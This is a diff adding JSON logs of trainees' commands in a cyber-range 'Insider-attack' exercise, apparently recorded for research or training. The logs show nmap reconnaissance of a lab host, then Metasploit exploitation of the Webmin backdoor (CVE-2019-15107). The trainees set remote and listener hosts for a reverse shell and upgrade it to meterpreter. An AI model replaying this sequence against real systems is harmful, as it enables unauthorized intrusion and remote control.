2022-11-00 Insider-attack/results-ok/logs/sandbox-123-useractions.json 0 → 100644 +26 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:50:43.709381Z","sandbox_id":"123","cmd":"ping 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:16.328697Z","sandbox_id":"123","cmd":"nmap help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:20.147310Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:27.296503Z","sandbox_id":"123","cmd":"clear","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:28.231953Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:55:14.616800Z","sandbox_id":"123","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:57:33.497027Z","sandbox_id":"123","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:20.874488Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 22","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:39.444274Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:47.627591Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:53.879278Z","sandbox_id":"123","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:56.315315Z","sandbox_id":"123","cmd":"ls /","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:09:24.017652Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:19.379669Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:34.620924Z","sandbox_id":"123","cmd":"RHOST","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:39.842294Z","sandbox_id":"123","cmd":"RHOSTS","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:49.211873Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:56.673791Z","sandbox_id":"123","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:11:02.890911Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:04.840603Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:25.936841Z","sandbox_id":"123","cmd":"path-to-exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:41.334465Z","sandbox_id":"123","cmd":"expoit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:53.767159Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:01.249877Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:07.120898Z","sandbox_id":"123","cmd":"set RPORTS 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:13.691804Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"}
2022-11-00 Insider-attack/results-ok/logs/sandbox-124-useractions.json 0 → 100644 +53 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:01.081260Z","sandbox_id":"124","cmd":"nmap -Ov 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:11.248131Z","sandbox_id":"124","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:43.272688Z","sandbox_id":"124","cmd":"nmap -V -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:54.962573Z","sandbox_id":"124","cmd":"nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:58.143386Z","sandbox_id":"124","cmd":"sudo nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:03:19.901139Z","sandbox_id":"124","cmd":"sudo nmap -sV -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:04:12.554536Z","sandbox_id":"124","cmd":"sudo nmap -O 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:05:12.781849Z","sandbox_id":"124","cmd":"curl -Lk 172.18.1.5:10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:07:53.495812Z","sandbox_id":"124","cmd":"snet-sensor-mgmt","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:02.093457Z","sandbox_id":"124","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:05.317723Z","sandbox_id":"124","cmd":"man curl","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:34.431155Z","sandbox_id":"124","cmd":"man passwd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:59.617131Z","sandbox_id":"124","cmd":"passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:20.433921Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:27.006518Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:42.436820Z","sandbox_id":"124","cmd":"chgpasswd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:27.105568Z","sandbox_id":"124","cmd":"metasploit","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:36.681270Z","sandbox_id":"124","cmd":"ls /bin","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:08.497464Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:15.546639Z","sandbox_id":"124","cmd":"man msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:36.045329Z","sandbox_id":"124","cmd":"man msfvenom","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:47.639167Z","sandbox_id":"124","cmd":"msf","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:49.960270Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:36.345571Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:54.097039Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:15.188181Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:31.171737Z","sandbox_id":"124","cmd":"set RHOSTS=172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:36.843859Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:10.680011Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:12.790210Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:26.164691Z","sandbox_id":"124","cmd":"info 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:57.098112Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:30.780366Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:14.357116Z","sandbox_id":"124","cmd":"set LHOST 127.0.0.1","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:23.661702Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:07.545146Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:17.641556Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:31.133251Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:12.737289Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:29.578848Z","sandbox_id":"124","cmd":"use post/multi/manage/shell_to_meterpreter","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:32.546857Z","sandbox_id":"124","cmd":"session -l","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:38.249728Z","sandbox_id":"124","cmd":"exit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:39.340080Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:52.022503Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:56.191182Z","sandbox_id":"124","cmd":"5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:59.378217Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:02.308571Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:14.278996Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:16.962308Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:35.811474Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:46.206315Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:58.398985Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:39:04.339243Z","sandbox_id":"124","cmd":"set LHOST eth1","pool_id":"26","cmd_type":"msf-command"}
2022-11-00 Insider-attack/results-ok/logs/sandbox-125-useractions.json 0 → 100644 +20 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:14:29.279655Z","sandbox_id":"125","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:16:28.428766Z","sandbox_id":"125","cmd":"ssh 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:17:29.531158Z","sandbox_id":"125","cmd":"nmap -p- 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:12.119723Z","sandbox_id":"125","cmd":"v","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:20.645641Z","sandbox_id":"125","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:59.242225Z","sandbox_id":"125","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:06.864747Z","sandbox_id":"125","cmd":"python ssh2john.py","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:52.036898Z","sandbox_id":"125","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:12.692132Z","sandbox_id":"125","cmd":"help","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:34.509328Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:42.757532Z","sandbox_id":"125","pool_id":"26","cmd_type":"msf-command","tags":["_jsonparsefailure"]} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:50.717307Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:55.186929Z","sandbox_id":"125","cmd":"info 0","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:04.332580Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:07.976763Z","sandbox_id":"125","cmd":"use 0","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:27.968897Z","sandbox_id":"125","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:46.009119Z","sandbox_id":"125","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:56.254909Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:33.974672Z","sandbox_id":"125","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:43:20.146042Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}
